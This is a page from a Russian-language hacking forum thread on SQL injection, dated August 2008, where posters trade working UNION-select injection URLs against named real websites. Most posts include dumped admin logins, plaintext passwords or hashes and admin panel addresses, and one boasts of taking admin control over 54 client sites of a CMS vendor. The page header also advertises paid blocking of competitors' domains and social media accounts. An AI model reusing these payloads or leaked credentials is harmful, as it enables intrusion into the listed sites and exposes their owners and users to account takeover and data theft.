Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 641 из 1242

641

Опции темы

Поиск в этой теме

Опции просмотра

#6401

21.08.2008, 16:05

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Иногда из-за идиотизма одного страдают многие.......
Не успел запостить http://www.bridesathotbobbins.co.uk/

Как, совершенно ненароком, мой взор пал на маааханькую приписочку снизу... А именнно
Powered by Qwicsite Pro

Да,да дружок! Именно там где мы логинимся вместо нерадивого админа. Зайдя на сайт этой чудной смски, я с удивлением обнаружил что баг то не местного разлива, а именно роднной баг СМС и исправлть его никто нигде не брался!!!

http://www.qwic.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password)+from+accounts/*

Login:admin Pass:stolave22

Там есть подраздельчик Qwicsite Pro websites admin, заходим туда и админим сразу всех их клиентов!!! А их не много не мало - 54 штуки!!!!

#6402

21.08.2008, 16:46

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

http://www.farmnet.eu/wcr/index.php?page=news/detail&newsID=11+and+1=2+union+select+concat_ws(0x 3a,user(),version(),database()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15/*

user() = eu-info@localhost
version() = 5.0.27
database() = db02

http://www.farmnet.eu/wcr/index.php?page=log-in

wcr-team:maize

#6403

21.08.2008, 19:28

softrix

Новичок

Регистрация: 05.07.2008

Сообщений: 16

Провел на форуме:
64853

Репутация: 7

http://www.hotels-piter.spb.ru/pages_piter.php?idleft=-4+union+select+concat(login,7,password)+from+users

Только ХЗ от чего пароль, к админке не подходит

!
Ну может кому интерестно пороет найдет, если найдете отпишитесь, любопытно !

#6404

21.08.2008, 22:15

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3 a,u_username,0x3a3a,u_password),4+from+users/*

http://msracing.co.uk/admin/

login:msrcng06 pass:msrcng2006

#6405

21.08.2008, 23:57

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6 ,7,8,9,0,version(),2/*
4.1.20-log

#6406

22.08.2008, 00:38

Elephant

Новичок

Регистрация: 31.07.2008

Сообщений: 11

Провел на форуме:
39796

Репутация: -3

Отправить сообщение для Elephant с помощью ICQ

Отправить сообщение для Elephant с помощью MSN

Отправить сообщение для Elephant с помощью Yahoo

Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'

#6407

22.08.2008, 00:57

4p3

Участник форума

Регистрация: 18.08.2008

Сообщений: 159

Провел на форуме:
750247

Репутация: 92

Отправить сообщение для 4p3 с помощью ICQ

Цитата:

Сообщение от Elephant

Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'

Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.

#6408

22.08.2008, 15:32

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

Провел на форуме:
1357043

Репутация: 137

http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

user() = fbmbmx@localhost
version() = 4.1.21-log
database() = fbmbmx

admins
name:password

mike:erb9768
john:lee7124
steve:crandall4776
tom:blyth24
mikefixed:erb9768

Последний раз редактировалось nicusor; 22.08.2008 в 15:48..

#6409

22.08.2008, 23:46

DTW

Участник форума

Регистрация: 11.05.2008

Сообщений: 202

Провел на форуме:
420713

Репутация: 104

Цитата:

http://www.planeta-lv.com/index_flash.php?page=1&sub=1'+union+select+1,2,3,4 ,5,6,7,8,TABLE_NAME,0,1,2,3+FROM+INFORMATION_SCHEM A.TABLES/*

планета

#6410

23.08.2008, 01:02

softrix

Новичок

Регистрация: 05.07.2008

Сообщений: 16

Провел на форуме:
64853

Репутация: 7

Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш

И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще !

http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),logi nname,char(58,58,58),password,char(58,58,58),salt, char(58,58,58),title,char(58,58,58),firstname,char (58,58,58),lastname,char(58,58,58),email,char(58,5 8,58),inactive),3+from+cfw_auth_login

name::

ass:::salt
admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf8 29896e1ccbfbc63c934077c6c

Страница 641 из 1242

641

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход